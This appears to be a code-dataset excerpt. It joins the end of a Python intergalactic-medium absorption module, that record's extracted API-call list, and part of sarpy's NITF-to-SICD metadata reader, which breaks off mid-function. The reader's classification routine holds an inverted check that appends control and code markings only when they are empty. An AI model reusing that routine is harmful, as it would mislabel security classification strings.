z1LAF = 1.2
z2LAF = 4.7
l2 = self.lam #[:, np.newaxis]
tLSLAF_value = np.zeros_like(lobs*l2).T
x0 = (lobs < l2*(1+zS))
x1 = x0 & (lobs < l2*(1+z1LAF))
x2 = x0 & ((lobs >= l2*(1+z1LAF)) & (lobs < l2*(1+z2LAF)))
x3 = x0 & (lobs >= l2*(1+z2LAF))
tLSLAF_value = np.zeros_like(lobs*l2)
tLSLAF_value[x1] += ((self.ALAF1/l2**1.2)*lobs**1.2)[x1]
tLSLAF_value[x2] += ((self.ALAF2/l2**3.7)*lobs**3.7)[x2]
tLSLAF_value[x3] += ((self.ALAF3/l2**5.5)*lobs**5.5)[x3]
return tLSLAF_value.sum(axis=0)
def tLSDLA(self, zS, lobs):
"""
Lyman Series, DLA
"""
z1DLA = 2.0
l2 = self.lam #[:, np.newaxis]
tLSDLA_value = np.zeros_like(lobs*l2)
x0 = (lobs < l2*(1+zS)) & (lobs < l2*(1.+z1DLA))
x1 = (lobs < l2*(1+zS)) & ~(lobs < l2*(1.+z1DLA))
tLSDLA_value[x0] += ((self.ADLA1/l2**2)*lobs**2)[x0]
tLSDLA_value[x1] += ((self.ADLA2/l2**3)*lobs**3)[x1]
return tLSDLA_value.sum(axis=0)
def tLCDLA(self, zS, lobs):
"""
Lyman continuum, DLA
"""
z1DLA = 2.0
lamL = 911.8
tLCDLA_value = np.zeros_like(lobs)
x0 = lobs < lamL*(1.+zS)
if zS < z1DLA:
tLCDLA_value[x0] = 0.2113 * _pow(1.0+zS, 2) - 0.07661 * _pow(1.0+zS, 2.3) * _pow(lobs[x0]/lamL, (-3e-1)) - 0.1347 * _pow(lobs[x0]/lamL, 2)
else:
x1 = lobs >= lamL*(1.+z1DLA)
tLCDLA_value[x0 & x1] = 0.04696 * _pow(1.0+zS, 3) - 0.01779 * _pow(1.0+zS, 3.3) * _pow(lobs[x0 & x1]/lamL, (-3e-1)) - 0.02916 * _pow(lobs[x0 & x1]/lamL, 3)
tLCDLA_value[x0 & ~x1] =0.6340 + 0.04696 * _pow(1.0+zS, 3) - 0.01779 * _pow(1.0+zS, 3.3) * _pow(lobs[x0 & ~x1]/lamL, (-3e-1)) - 0.1347 * _pow(lobs[x0 & ~x1]/lamL, 2) - 0.2905 * _pow(lobs[x0 & ~x1]/lamL, (-3e-1))
return tLCDLA_value
def tLCLAF(self, zS, lobs):
"""
Lyman continuum, LAF
"""
z1LAF = 1.2
z2LAF = 4.7
lamL = 911.8
tLCLAF_value = np.zeros_like(lobs)
x0 = lobs < lamL*(1.+zS)
if zS < z1LAF:
tLCLAF_value[x0] = 0.3248 * (_pow(lobs[x0]/lamL, 1.2) - _pow(1.0+zS, -9e-1) * _pow(lobs[x0]/lamL, 2.1))
elif zS < z2LAF:
x1 = lobs >= lamL*(1+z1LAF)
tLCLAF_value[x0 & x1] = 2.545e-2 * (_pow(1.0+zS, 1.6) * _pow(lobs[x0 & x1]/lamL, 2.1) - _pow(lobs[x0 & x1]/lamL, 3.7))
tLCLAF_value[x0 & ~x1] = 2.545e-2 * _pow(1.0+zS, 1.6) * _pow(lobs[x0 & ~x1]/lamL, 2.1) + 0.3248 * _pow(lobs[x0 & ~x1]/lamL, 1.2) - 0.2496 * _pow(lobs[x0 & ~x1]/lamL, 2.1)
else:
x1 = lobs > lamL*(1.+z2LAF)
x2 = (lobs >= lamL*(1.+z1LAF)) & (lobs < lamL*(1.+z2LAF))
x3 = lobs < lamL*(1.+z1LAF)
tLCLAF_value[x0 & x1] = 5.221e-4 * (_pow(1.0+zS, 3.4) * _pow(lobs[x0 & x1]/lamL, 2.1) - _pow(lobs[x0 & x1]/lamL, 5.5))
tLCLAF_value[x0 & x2] = 5.221e-4 * _pow(1.0+zS, 3.4) * _pow(lobs[x0 & x2]/lamL, 2.1) + 0.2182 * _pow(lobs[x0 & x2]/lamL, 2.1) - 2.545e-2 * _pow(lobs[x0 & x2]/lamL, 3.7)
tLCLAF_value[x0 & x3] = 5.221e-4 * _pow(1.0+zS, 3.4) * _pow(lobs[x0 & x3]/lamL, 2.1) + 0.3248 * _pow(lobs[x0 & x3]/lamL, 1.2) - 3.140e-2 * _pow(lobs[x0 & x3]/lamL, 2.1)
return tLCLAF_value
def full_IGM(self, z, lobs):
"""Get full Inoue IGM absorption
Parameters
----------
z : float
Redshift to evaluate IGM absorption
lobs : array
Observed-frame wavelength(s) in Angstroms.
Returns
-------
abs : array
IGM absorption
"""
tau_LS = self.tLSLAF(z, lobs) + self.tLSDLA(z, lobs)
tau_LC = self.tLCLAF(z, lobs) + self.tLCDLA(z, lobs)
### Upturn at short wavelengths, low-z
#k = 1./100
#l0 = 600-6/k
#clip = lobs/(1+z) < 600.
#tau_clip = 100*(1-1./(1+np.exp(-k*(lobs/(1+z)-l0))))
tau_clip = 0.
return np.exp(-self.scale_tau*(tau_LC + tau_LS + tau_clip))
def build_grid(self, zgrid, lrest):
"""Build a spline interpolation object for fast IGM models
Returns: self.interpolate
"""
from scipy.interpolate import CubicSpline
igm_grid = np.zeros((len(zgrid), len(lrest)))
for iz in range(len(zgrid)):
igm_grid[iz,:] = self.full_IGM(zgrid[iz], lrest*(1+zgrid[iz]))
self.interpolate = CubicSpline(zgrid, igm_grid)
def _pow(a, b):
"""C-like power, a**b
"""
return a**b
|
[
"numpy.zeros_like",
"scipy.interpolate.CubicSpline",
"os.path.dirname",
"numpy.exp",
"numpy.loadtxt",
"os.path.join"
] |
[((692, 726), 'os.path.join', 'os.path.join', (['path', '"""LAFcoeff.txt"""'], {}), "(path, 'LAFcoeff.txt')\n", (704, 726), False, 'import os\n'), ((746, 780), 'os.path.join', 'os.path.join', (['path', '"""DLAcoeff.txt"""'], {}), "(path, 'DLAcoeff.txt')\n", (758, 780), False, 'import os\n'), ((801, 834), 'numpy.loadtxt', 'np.loadtxt', (['LAF_file'], {'unpack': '(True)'}), '(LAF_file, unpack=True)\n', (811, 834), True, 'import numpy as np\n'), ((1063, 1096), 'numpy.loadtxt', 'np.loadtxt', (['DLA_file'], {'unpack': '(True)'}), '(DLA_file, unpack=True)\n', (1073, 1096), True, 'import numpy as np\n'), ((1829, 1853), 'numpy.zeros_like', 'np.zeros_like', (['(lobs * l2)'], {}), '(lobs * l2)\n', (1842, 1853), True, 'import numpy as np\n'), ((2263, 2287), 'numpy.zeros_like', 'np.zeros_like', (['(lobs * l2)'], {}), '(lobs * l2)\n', (2276, 2287), True, 'import numpy as np\n'), ((2758, 2777), 'numpy.zeros_like', 'np.zeros_like', (['lobs'], {}), '(lobs)\n', (2771, 2777), True, 'import numpy as np\n'), ((3663, 3682), 'numpy.zeros_like', 'np.zeros_like', (['lobs'], {}), '(lobs)\n', (3676, 3682), True, 'import numpy as np\n'), ((5708, 5762), 'numpy.exp', 'np.exp', (['(-self.scale_tau * (tau_LC + tau_LS + tau_clip))'], {}), '(-self.scale_tau * (tau_LC + tau_LS + tau_clip))\n', (5714, 5762), True, 'import numpy as np\n'), ((6186, 6214), 'scipy.interpolate.CubicSpline', 'CubicSpline', (['zgrid', 'igm_grid'], {}), '(zgrid, igm_grid)\n', (6197, 6214), False, 'from scipy.interpolate import CubicSpline\n'), ((614, 639), 'os.path.dirname', 'os.path.dirname', (['filepath'], {}), '(filepath)\n', (629, 639), False, 'import os\n'), ((1583, 1607), 'numpy.zeros_like', 'np.zeros_like', (['(lobs * l2)'], {}), '(lobs * l2)\n', (1596, 1607), True, 'import numpy as np\n')]
|
"""
Work in progress for reading some other kind of complex NITF.
"""
__classification__ = "UNCLASSIFIED"
__author__ = "<NAME>"
import logging
from typing import Union, Tuple, List, Optional, Callable, Sequence
import copy
from datetime import datetime
import numpy
from scipy.constants import foot
from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf
from sarpy.geometry.latlon import num as lat_lon_parser
from sarpy.io.general.base import SarpyIOError
from sarpy.io.general.data_segment import DataSegment, SubsetSegment
from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction
from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader
from sarpy.io.general.nitf_elements.security import NITFSecurityTags
from sarpy.io.general.nitf_elements.image import ImageSegmentHeader, ImageSegmentHeader0
from sarpy.io.general.nitf_elements.nitf_head import NITFHeader, NITFHeader0
from sarpy.io.general.nitf_elements.base import TREList
from sarpy.io.general.nitf_elements.tres.unclass.CMETAA import CMETAA
from sarpy.io.general.utils import is_file_like
from sarpy.io.complex.base import SICDTypeReader
from sarpy.io.complex.sicd_elements.SICD import SICDType
from sarpy.io.complex.sicd_elements.CollectionInfo import CollectionInfoType
from sarpy.io.complex.sicd_elements.ImageData import ImageDataType
from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType
from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType
from sarpy.io.complex.sicd_elements.Timeline import TimelineType, IPPSetType
from sarpy.io.complex.sicd_elements.RadarCollection import RadarCollectionType, \
TxFrequencyType, WaveformParametersType, ChanParametersType
from sarpy.io.complex.sicd_elements.SCPCOA import SCPCOAType
from sarpy.io.complex.sicd_elements.ImageFormation import ImageFormationType, TxFrequencyProcType
from sarpy.io.complex.sicd_elements.ImageCreation import ImageCreationType
from sarpy.io.complex.sicd_elements.PFA import PFAType
logger = logging.getLogger(__name__)
_iso_date_format = '{}-{}-{}T{}:{}:{}'
# NB: DO NOT implement is_a() here.
# This will explicitly happen after other readers
########
# Define sicd structure from image sub-header information
def extract_sicd(
img_header: Union[ImageSegmentHeader, ImageSegmentHeader0],
transpose: True,
nitf_header: Optional[Union[NITFHeader, NITFHeader0]] = None) -> SICDType:
"""
Extract the best available SICD structure from relevant nitf header structures.
Parameters
----------
img_header : ImageSegmentHeader|ImageSegmentHeader0
transpose : bool
nitf_header : None|NITFHeader|NITFHeader0
Returns
-------
SICDType
"""
def get_collection_info() -> CollectionInfoType:
isorce = img_header.ISORCE.strip()
collector_name = None if len(isorce) < 1 else isorce
iid2 = img_header.IID2.strip()
core_name = img_header.IID1.strip() if len(iid2) < 1 else iid2
class_str = img_header.Security.CLAS
if class_str == 'T':
classification = 'TOPSECRET'
elif class_str == 'S':
classification = 'SECRET'
elif class_str == 'C':
classification = 'CONFIDENTIAL'
elif class_str == 'U':
classification = 'UNCLASSIFIED'
else:
classification = ''
ctlh = img_header.Security.CTLH.strip()
if len(ctlh) < 1:
classification += '//' + ctlh
code = img_header.Security.CODE.strip()
if len(code) < 1:
classification += '//' + code
return CollectionInfoType(
CollectorName=collector_name,
CoreName=core_name,
Classification=classification)
def get_image_data() -> ImageDataType:
pvtype = img_header.PVTYPE
if pvtype == 'C':
if img_header.NBPP != 64:
logger.warning(
'This NITF has complex bands that are not 64-bit.\n\t'
'This is not currently supported.')
pixel_type = 'RE32F_IM32F'
elif pvtype == 'R':
if img_header.NBPP == 64:
logger.warning(
'The real/imaginary data in the NITF are stored as 64-bit floating point.\n\t'
'The closest Pixel Type, RE32F_IM32F, will be used,\n\t'
'but there may be overflow issues if converting this file.')
pixel_type = 'RE32F_IM32F'
elif pvtype == 'SI':
pixel_type = 'RE16I_IM16I'
else:
raise ValueError('Got unhandled PVTYPE {}'.format(pvtype))
if transpose:
rows = img_header.NCOLS
cols = img_header.NROWS
else:
rows = img_header.NROWS
cols = img_header.NCOLS
return ImageDataType(
PixelType=pixel_type,
NumRows=rows,
NumCols=cols,
FirstRow=0,
FirstCol=0,
FullImage=(rows, cols),
SCPPixel=(0.5 * rows, 0.5 * cols))
def append_country_code(cc) -> None:
if len(cc) > 0:
if the_sicd.CollectionInfo is None:
the_sicd.CollectionInfo = CollectionInfoType(CountryCodes=[cc, ])
elif the_sicd.CollectionInfo.CountryCodes is None:
the_sicd.CollectionInfo.CountryCodes = [cc, ]
elif cc not in the_sicd.CollectionInfo.CountryCodes:
the_sicd.CollectionInfo.CountryCodes.append(cc)
def set_image_corners(icps: numpy.ndarray, override: bool = False) -> None:
if the_sicd.GeoData is None:
the_sicd.GeoData = GeoDataType(ImageCorners=icps)
elif the_sicd.GeoData.ImageCorners is None or override:
the_sicd.GeoData.ImageCorners = icps
def set_arp_position(arp_ecf: numpy.ndarray, override: bool = False) -> None:
if the_sicd.SCPCOA is None:
the_sicd.SCPCOA = SCPCOAType(ARPPos=arp_ecf)
elif override:
# prioritize this information first - it should be more reliable than other sources
the_sicd.SCPCOA.ARPPos = arp_ecf
def set_scp(scp_ecf: numpy.ndarray, scp_pixel: Union[numpy.ndarray, list, tuple], override: bool = False) -> None:
def set_scppixel():
if the_sicd.ImageData is None:
the_sicd.ImageData = ImageDataType(SCPPixel=scp_pixel)
else:
the_sicd.ImageData.SCPPixel = scp_pixel
if the_sicd.GeoData is None:
the_sicd.GeoData = GeoDataType(SCP=SCPType(ECF=scp_ecf))
set_scppixel()
elif the_sicd.GeoData.SCP is None or override:
the_sicd.GeoData.SCP = SCPType(ECF=scp_ecf)
set_scppixel()
def set_collect_start(
collect_start: Union[str, datetime, numpy.datetime64], override: bool = False) -> None:
if the_sicd.Timeline is None:
the_sicd.Timeline = TimelineType(CollectStart=collect_start)
elif the_sicd.Timeline.CollectStart is None or override:
the_sicd.Timeline.CollectStart = collect_start
def set_uvects(row_unit: numpy.ndarray, col_unit: numpy.ndarray) -> None:
if the_sicd.Grid is None:
the_sicd.Grid = GridType(
Row=DirParamType(UVectECF=row_unit),
Col=DirParamType(UVectECF=col_unit))
return
if the_sicd.Grid.Row is None:
the_sicd.Grid.Row = DirParamType(UVectECF=row_unit)
elif the_sicd.Grid.Row.UVectECF is None:
the_sicd.Grid.Row.UVectECF = row_unit
if the_sicd.Grid.Col is None:
the_sicd.Grid.Col = DirParamType(UVectECF=col_unit)
elif the_sicd.Grid.Col.UVectECF is None:
the_sicd.Grid.Col.UVectECF = col_unit
def try_CMETAA() -> None:
# noinspection PyTypeChecker
tre = None if tres is None else tres['CMETAA'] # type: CMETAA
if tre is None:
return
cmetaa = tre.DATA
if the_sicd.GeoData is None:
the_sicd.GeoData = GeoDataType()
if the_sicd.SCPCOA is None:
the_sicd.SCPCOA = SCPCOAType()
if the_sicd.Grid is None:
the_sicd.Grid = GridType()
if the_sicd.Timeline is None:
the_sicd.Timeline = TimelineType()
if the_sicd.RadarCollection is None:
the_sicd.RadarCollection = RadarCollectionType()
if the_sicd.ImageFormation is None:
the_sicd.ImageFormation = ImageFormationType()
the_sicd.SCPCOA.SCPTime = 0.5*float(cmetaa.WF_CDP)
the_sicd.GeoData.SCP = SCPType(ECF=tre.get_scp())
the_sicd.SCPCOA.ARPPos = tre.get_arp()
the_sicd.SCPCOA.SideOfTrack = cmetaa.CG_LD.strip().upper()
the_sicd.SCPCOA.SlantRange = float(cmetaa.CG_SRAC)
the_sicd.SCPCOA.DopplerConeAng = float(cmetaa.CG_CAAC)
the_sicd.SCPCOA.GrazeAng = float(cmetaa.CG_GAAC)
the_sicd.SCPCOA.IncidenceAng = 90 - float(cmetaa.CG_GAAC)
if hasattr(cmetaa, 'CG_TILT'):
the_sicd.SCPCOA.TwistAng = float(cmetaa.CG_TILT)
if hasattr(cmetaa, 'CG_SLOPE'):
the_sicd.SCPCOA.SlopeAng = float(cmetaa.CG_SLOPE)
the_sicd.ImageData.SCPPixel = [int(cmetaa.IF_DC_IS_COL), int(cmetaa.IF_DC_IS_ROW)]
img_corners = tre.get_image_corners()
if img_corners is not None:
the_sicd.GeoData.ImageCorners = img_corners
if cmetaa.CMPLX_SIGNAL_PLANE.upper() == 'S':
the_sicd.Grid.ImagePlane = 'SLANT'
elif cmetaa.CMPLX_SIGNAL_PLANE.upper() == 'G':
the_sicd.Grid.ImagePlane = 'GROUND'
else:
logger.warning(
'Got unexpected CMPLX_SIGNAL_PLANE value {},\n\t'
'setting ImagePlane to SLANT'.format(cmetaa.CMPLX_SIGNAL_PLANE))
the_sicd.Grid.Row = DirParamType(
SS=float(cmetaa.IF_RSS),
ImpRespWid=float(cmetaa.IF_RGRES),
Sgn=1 if cmetaa.IF_RFFTS.strip() == '-' else -1, # opposite sign convention
ImpRespBW=float(cmetaa.IF_RFFT_SAMP)/(float(cmetaa.IF_RSS)*float(cmetaa.IF_RFFT_TOT)))
the_sicd.Grid.Col = DirParamType(
SS=float(cmetaa.IF_AZSS),
ImpRespWid=float(cmetaa.IF_AZRES),
Sgn=1 if cmetaa.IF_AFFTS.strip() == '-' else -1, # opposite sign convention
ImpRespBW=float(cmetaa.IF_AZFFT_SAMP)/(float(cmetaa.IF_AZSS)*float(cmetaa.IF_AZFFT_TOT)))
cmplx_weight = cmetaa.CMPLX_WEIGHT.strip().upper()
if cmplx_weight == 'UWT':
the_sicd.Grid.Row.WgtType = WgtTypeType(WindowName='UNIFORM')
the_sicd.Grid.Col.WgtType = WgtTypeType(WindowName='UNIFORM')
elif cmplx_weight == 'HMW':
the_sicd.Grid.Row.WgtType = WgtTypeType(WindowName='HAMMING')
the_sicd.Grid.Col.WgtType = WgtTypeType(WindowName='HAMMING')
elif cmplx_weight == 'HNW':
the_sicd.Grid.Row.WgtType = WgtTypeType(WindowName='HANNING')
the_sicd.Grid.Col.WgtType = WgtTypeType(WindowName='HANNING')
elif cmplx_weight == 'TAY':
the_sicd.Grid.Row.WgtType = WgtTypeType(
WindowName='TAYLOR',
Parameters={
'SLL': '-{0:d}'.format(int(cmetaa.CMPLX_RNG_SLL)),
'NBAR': '{0:d}'.format(int(cmetaa.CMPLX_RNG_TAY_NBAR))})
the_sicd.Grid.Col.WgtType = WgtTypeType(
WindowName='TAYLOR',
Parameters={
'SLL': '-{0:d}'.format(int(cmetaa.CMPLX_AZ_SLL)),
'NBAR': '{0:d}'.format(int(cmetaa.CMPLX_AZ_TAY_NBAR))})
else:
logger.warning(
'Got unsupported CMPLX_WEIGHT value {}.\n\tThe resulting SICD will '
'not have valid weight array populated'.format(cmplx_weight))
the_sicd.Grid.Row.define_weight_function()
the_sicd.Grid.Col.define_weight_function()
# noinspection PyBroadException
try:
date_str = cmetaa.T_UTC_YYYYMMMDD
time_str = cmetaa.T_HHMMSSUTC
date_time = _iso_date_format.format(
date_str[:4], date_str[4:6], date_str[6:8],
time_str[:2], time_str[2:4], time_str[4:6])
the_sicd.Timeline.CollectStart = numpy.datetime64(date_time, 'us')
except Exception:
logger.info('Failed extracting start time from CMETAA')
pass
the_sicd.Timeline.CollectDuration = float(cmetaa.WF_CDP)
the_sicd.Timeline.IPP = [
IPPSetType(TStart=0,
TEnd=float(cmetaa.WF_CDP),
IPPStart=0,
IPPEnd=numpy.floor(float(cmetaa.WF_CDP)*float(cmetaa.WF_PRF)),
IPPPoly=[0, float(cmetaa.WF_PRF)])]
the_sicd.RadarCollection.TxFrequency = TxFrequencyType(
Min=float(cmetaa.WF_SRTFR),
Max=float(cmetaa.WF_ENDFR))
the_sicd.RadarCollection.TxPolarization = cmetaa.POL_TR.upper()
the_sicd.RadarCollection.Waveform = [WaveformParametersType(
TxPulseLength=float(cmetaa.WF_WIDTH),
TxRFBandwidth=float(cmetaa.WF_BW),
TxFreqStart=float(cmetaa.WF_SRTFR),
TxFMRate=float(cmetaa.WF_CHRPRT)*1e12)]
tx_rcv_pol = '{}:{}'.format(cmetaa.POL_TR.upper(), cmetaa.POL_RE.upper())
the_sicd.RadarCollection.RcvChannels = [
ChanParametersType(TxRcvPolarization=tx_rcv_pol)]
the_sicd.ImageFormation.TxRcvPolarizationProc = tx_rcv_pol
if_process = cmetaa.IF_PROCESS.strip().upper()
if if_process == 'PF':
the_sicd.ImageFormation.ImageFormAlgo = 'PFA'
scp_ecf = tre.get_scp()
fpn_ned = numpy.array(
[float(cmetaa.CG_FPNUV_X), float(cmetaa.CG_FPNUV_Y), float(cmetaa.CG_FPNUV_Z)], dtype='float64')
ipn_ned = numpy.array(
[float(cmetaa.CG_IDPNUVX), float(cmetaa.CG_IDPNUVY), float(cmetaa.CG_IDPNUVZ)], dtype='float64')
fpn_ecf = ned_to_ecf(fpn_ned, scp_ecf, absolute_coords=False)
ipn_ecf = ned_to_ecf(ipn_ned, scp_ecf, absolute_coords=False)
the_sicd.PFA = PFAType(FPN=fpn_ecf, IPN=ipn_ecf)
elif if_process in ['RM', 'CD']:
the_sicd.ImageFormation.ImageFormAlgo = 'RMA'
# the remainder of this is guesswork to define required fields
the_sicd.ImageFormation.TStartProc = 0 # guess work
the_sicd.ImageFormation.TEndProc = float(cmetaa.WF_CDP)
the_sicd.ImageFormation.TxFrequencyProc = TxFrequencyProcType(
MinProc=float(cmetaa.WF_SRTFR), MaxProc=float(cmetaa.WF_ENDFR))
# all remaining guess work
the_sicd.ImageFormation.STBeamComp = 'NO'
the_sicd.ImageFormation.ImageBeamComp = 'SV' if cmetaa.IF_BEAM_COMP[0] == 'Y' else 'NO'
the_sicd.ImageFormation.AzAutofocus = 'NO' if cmetaa.AF_TYPE[0] == 'N' else 'SV'
the_sicd.ImageFormation.RgAutofocus = 'NO'
def try_AIMIDA() -> None:
tre = None if tres is None else tres['AIMIDA']
if tre is None:
return
aimida = tre.DATA
append_country_code(aimida.COUNTRY.strip())
create_time = datetime.strptime(aimida.CREATION_DATE, '%d%b%y')
if the_sicd.ImageCreation is None:
the_sicd.ImageCreation = ImageCreationType(DateTime=create_time)
elif the_sicd.ImageCreation.DateTime is None:
the_sicd.ImageCreation.DateTime = create_time
collect_start = datetime.strptime(aimida.MISSION_DATE+aimida.TIME, '%d%b%y%H%M')
set_collect_start(collect_start, override=False)
def try_AIMIDB() -> None:
tre = None if tres is None else tres['AIMIDB']
if tre is None:
return
aimidb = tre.DATA
append_country_code(aimidb.COUNTRY.strip())
if the_sicd.ImageFormation is not None and the_sicd.ImageFormation.SegmentIdentifier is None:
the_sicd.ImageFormation.SegmentIdentifier = aimidb.CURRENT_SEGMENT.strip()
date_str = aimidb.ACQUISITION_DATE
collect_start = numpy.datetime64(_iso_date_format.format(
date_str[:4], date_str[4:6], date_str[6:8],
date_str[8:10], date_str[10:12], date_str[12:14]), 'us')
set_collect_start(collect_start, override=False)
def try_ACFT() -> None:
if tres is None:
return
tre = tres['ACFTA']
if tre is None:
tre = tres['ACFTB']
if tre is None:
return
acft = tre.DATA
sensor_id = acft.SENSOR_ID.strip()
if len(sensor_id) > 1:
if the_sicd.CollectionInfo is None:
the_sicd.CollectionInfo = CollectionInfoType(CollectorName=sensor_id)
elif the_sicd.CollectionInfo.CollectorName is None:
the_sicd.CollectionInfo.CollectorName = sensor_id
row_ss = float(acft.ROW_SPACING)
col_ss = float(acft.COL_SPACING)
if hasattr(acft, 'ROW_SPACING_UNITS') and acft.ROW_SPACING_UNITS.strip().lower() == 'f':
row_ss *= foot
if hasattr(acft, 'COL_SPACING_UNITS') and acft.COL_SPACING_UNITS.strip().lower() == 'f':
col_ss *= foot
# NB: these values are actually ground plane values, and should be
# corrected to slant plane if possible
if the_sicd.SCPCOA is not None:
if the_sicd.SCPCOA.GrazeAng is not None:
col_ss *= numpy.cos(numpy.deg2rad(the_sicd.SCPCOA.GrazeAng))
if the_sicd.SCPCOA.TwistAng is not None:
row_ss *= numpy.cos(numpy.deg2rad(the_sicd.SCPCOA.TwistAng))
if the_sicd.Grid is None:
the_sicd.Grid = GridType(Row=DirParamType(SS=row_ss), Col=DirParamType(SS=col_ss))
return
if the_sicd.Grid.Row is None:
the_sicd.Grid.Row = DirParamType(SS=row_ss)
elif the_sicd.Grid.Row.SS is None:
the_sicd.Grid.Row.SS = row_ss
if the_sicd.Grid.Col is None:
the_sicd.Grid.Col = DirParamType(SS=col_ss)
elif the_sicd.Grid.Col.SS is None:
the_sicd.Grid.Col.SS = col_ss
def try_BLOCKA() -> None:
tre = None if tres is None else tres['BLOCKA']
if tre is None:
return
blocka = tre.DATA
icps = []
for fld_name in ['FRFC_LOC', 'FRLC_LOC', 'LRLC_LOC', 'LRFC_LOC']:
value = getattr(blocka, fld_name)
# noinspection PyBroadException
try:
lat_val = float(value[:10])
lon_val = float(value[10:21])
except ValueError:
lat_val = lat_lon_parser(value[:10])
lon_val = lat_lon_parser(value[10:21])
icps.append([lat_val, lon_val])
set_image_corners(icps, override=False)
def try_MPDSRA() -> None:
def valid_array(arr):
return numpy.all(numpy.isfinite(arr)) and numpy.any(arr != 0)
tre = None if tres is None else tres['MPDSRA']
if tre is None:
return
mpdsra = tre.DATA
scp_ecf = foot*numpy.array(
[float(mpdsra.ORO_X), float(mpdsra.ORO_Y), float(mpdsra.ORO_Z)], dtype='float64')
if valid_array(scp_ecf):
set_scp(scp_ecf, (int(mpdsra.ORP_COLUMN) - 1, int(mpdsra.ORP_ROW) - 1), override=False)
arp_pos_ned = foot*numpy.array(
[float(mpdsra.ARP_POS_N), float(mpdsra.ARP_POS_E), float(mpdsra.ARP_POS_D)], dtype='float64')
arp_vel_ned = foot*numpy.array(
[float(mpdsra.ARP_VEL_N), float(mpdsra.ARP_VEL_E), float(mpdsra.ARP_VEL_D)], dtype='float64')
arp_acc_ned = foot*numpy.array(
[float(mpdsra.ARP_ACC_N), float(mpdsra.ARP_ACC_E), float(mpdsra.ARP_ACC_D)], dtype='float64')
arp_pos = ned_to_ecf(arp_pos_ned, scp_ecf, absolute_coords=True) if valid_array(arp_pos_ned) else None
set_arp_position(arp_pos, override=False)
arp_vel = ned_to_ecf(arp_vel_ned, scp_ecf, absolute_coords=False) if valid_array(arp_vel_ned) else None
if the_sicd.SCPCOA.ARPVel is None:
the_sicd.SCPCOA.ARPVel = arp_vel
arp_acc = ned_to_ecf(arp_acc_ned, scp_ecf, absolute_coords=False) if valid_array(arp_acc_ned) else None
if the_sicd.SCPCOA.ARPAcc is None:
the_sicd.SCPCOA.ARPAcc = arp_acc
if the_sicd.PFA is not None and the_sicd.PFA.FPN is None:
# TODO: is this already in meters?
fpn_ecf = numpy.array(
[float(mpdsra.FOC_X), float(mpdsra.FOC_Y), float(mpdsra.FOC_Z)], dtype='float64') # *foot
if valid_array(fpn_ecf):
the_sicd.PFA.FPN = fpn_ecf
def try_MENSRB() -> None:
tre = None if tres is None else tres['MENSRB']
if tre is None:
return
mensrb = tre.DATA
arp_llh = numpy.array(
[lat_lon_parser(mensrb.ACFT_LOC[:12]),
lat_lon_parser(mensrb.ACFT_LOC[12:25]),
foot*float(mensrb.ACFT_ALT)], dtype='float64')
scp_llh = numpy.array(
[lat_lon_parser(mensrb.RP_LOC[:12]),
lat_lon_parser(mensrb.RP_LOC[12:25]),
foot*float(mensrb.RP_ELV)], dtype='float64')
# TODO: handle the conversion from msl to hae
arp_ecf = geodetic_to_ecf(arp_llh)
scp_ecf = geodetic_to_ecf(scp_llh)
set_arp_position(arp_ecf, override=True)
set_scp(scp_ecf, (int(mensrb.RP_COL)-1, int(mensrb.RP_ROW)-1), override=False)
row_unit_ned = numpy.array(
[float(mensrb.C_R_NC), float(mensrb.C_R_EC), float(mensrb.C_R_DC)], dtype='float64')
col_unit_ned = numpy.array(
[float(mensrb.C_AZ_NC), float(mensrb.C_AZ_EC), float(mensrb.C_AZ_DC)], dtype='float64')
set_uvects(ned_to_ecf(row_unit_ned, scp_ecf, absolute_coords=False),
ned_to_ecf(col_unit_ned, scp_ecf, absolute_coords=False))
def try_MENSRA() -> None:
tre = None if tres is None else tres['MENSRA']
if tre is None:
return
mensra = tre.DATA
arp_llh = numpy.array(
[lat_lon_parser(mensra.ACFT_LOC[:10]),
lat_lon_parser(mensra.ACFT_LOC[10:21]),
foot*float(mensra.ACFT_ALT)], dtype='float64')
scp_llh = numpy.array(
[lat_lon_parser(mensra.CP_LOC[:10]),
lat_lon_parser(mensra.CP_LOC[10:21]),
foot*float(mensra.CP_ALT)], dtype='float64')
# TODO: handle the conversion from msl to hae
arp_ecf = geodetic_to_ecf(arp_llh)
scp_ecf = geodetic_to_ecf(scp_llh)
set_arp_position(arp_ecf, override=True)
# TODO: is this already zero based?
set_scp(geodetic_to_ecf(scp_llh), (int(mensra.CCRP_COL), int(mensra.CCRP_ROW)), override=False)
row_unit_ned = numpy.array(
[float(mensra.C_R_NC), float(mensra.C_R_EC), float(mensra.C_R_DC)], dtype='float64')
col_unit_ned = numpy.array(
[float(mensra.C_AZ_NC), float(mensra.C_AZ_EC), float(mensra.C_AZ_DC)], dtype='float64')
set_uvects(ned_to_ecf(row_unit_ned, scp_ecf, absolute_coords=False),
ned_to_ecf(col_unit_ned, scp_ecf, absolute_coords=False))
def extract_corners() -> None:
icps = extract_image_corners(img_header)
if icps is None:
return
# TODO: include symmetry transform issue
set_image_corners(icps, override=False)
def extract_start() -> None:
# noinspection PyBroadException
try:
date_str = img_header.IDATIM
collect_start = numpy.datetime64(
_iso_date_format.format(
date_str[:4], date_str[4:6], date_str[6:8],
date_str[8:10], date_str[10:12], date_str[12:14]), 'us')
except Exception:
logger.info('failed extracting start time from IDATIM tre')
return
set_collect_start(collect_start, override=False)
# noinspection PyUnresolvedReferences
tres = None if img_header.ExtendedHeader.data is None \
else img_header.ExtendedHeader.data # type: Union[None, TREList]
collection_info = get_collection_info()
image_data = get_image_data()
the_sicd = SICDType(
CollectionInfo=collection_info,
ImageData=image_data)
# apply the various tres and associated logic
# NB: this should generally be in order of preference
try_CMETAA()
try_AIMIDB()
try_AIMIDA()
try_ACFT()
try_BLOCKA()
try_MPDSRA()
try_MENSRA()
try_MENSRB()
extract_corners()
extract_start()
return the_sicd
# Helper methods for transforming data
def get_linear_magnitude_scaling(scale_factor: float):
"""
Get a linear magnitude scaling function, to correct magnitude.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
Returns
-------
callable
"""
def scaler(data):
return data/scale_factor
return scaler
def get_linear_power_scaling(scale_factor):
"""
Get a linear power scaling function, to derive correct magnitude.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
Returns
-------
callable
